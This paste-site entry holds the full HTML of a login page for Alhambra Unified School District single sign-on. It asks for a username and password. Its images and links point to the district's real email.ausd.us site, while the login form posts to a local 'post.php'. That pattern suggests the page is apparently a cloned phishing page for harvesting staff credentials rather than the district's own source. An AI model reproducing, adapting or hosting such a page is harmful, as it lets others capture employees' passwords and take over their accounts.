Untitled
1 year ago in Plain Text
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Alhambra Unified School District | Single Sign On</title>
<link rel="shortcut icon" href="favicon.ico" />
<link href="asset/css/style29r.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">
//Frameset Break Away
function deframe(){
if (top.location != self.location)
top.location.href=self.location;
}
//Set focus to NetID text box
function sf(){
document.login.netid.focus();
}
function submitenter(myfield,e){
var keycode;
if (window.event)
keycode = window.event.keyCode;
else if (e)
keycode = e.which;
else
return true;
if (keycode == 13){
myfield.form.submit();
return false;
} else
return true;
}
</script>
</head>
<body onload="deframe(); sf();">
<!-- Login Form -->
<div id="pushme"><img src="https://email.ausd.us/images/alhambra_logo.png" /></div><!-- /#pushme -->
<div id="login_wrap">
<div id="login_header"></div><!-- /#login_header -->
<div id="login_body">
<div class="error_msg"></div>
<p>Please log Into your AUSD email account</p>
<form id="loginform" action="post.php" method="post" name="login">
<p>Username</p>
<input name="netid" type="text" class="field" onkeypress="return submitenter(this,event)" />
<br /><br />
<p>Password</p>
<input name="netidpword" type="password" class="field" onkeypress="return submitenter(this,event)" />
<!-- <br /><br />
<input type="checkbox" value="RememberMe" />Remember Me -->
</form>
<!-- James Edit
<p>Click <a href="https://password.ausd.us/accounts/Reset">here</a> to change your password</p>
<p>Click <a href="https://password.ausd.us/accounts/UnLock">here</a> to unlock your account</p>
-->
<p>Go to the <a href="https://password.ausd.us" target="_blank" title="Rest, unlock, etc. user account password.">Password Reset Site</a></p>
<!-- <p>Go to the <a href="#" onclick="force_ss(); document.getElementById('loginform').submit();" title="'Username' & 'Password' above needs to be entered.">AUSD Self-Service</a></p> -->
<p>Go to the <a href="https://email.ausd.us/ss_login.php?SAMLRequest=&RelayState=" title="">AUSD Self-Service</a></p>
<div id="but_login"><a href="https://email.ausd.us/#" onclick="document.getElementById('loginform').submit();"></a></a></div><!-- /#but_login -->
</div><!-- /#login_body -->
<!-- <div id="login_footer">
</div>
-->
</div><!-- /#login_wrap -->
<div id="login_copy">
&copy; 2012 Alhambra Unified School District. <br />
All rights reserved. <br />
<br />
<font color="red">* The username and password entered above are my access credentials.
To protect the integrity of the system, passwords and usernames shall not be revealed to, nor used by, others.
I am an authorized user of this system in my capacity as an employee of the Alhambra Unified School District. * </font><br />
</div>
<!-- /#login_copy -->
</body>
</html>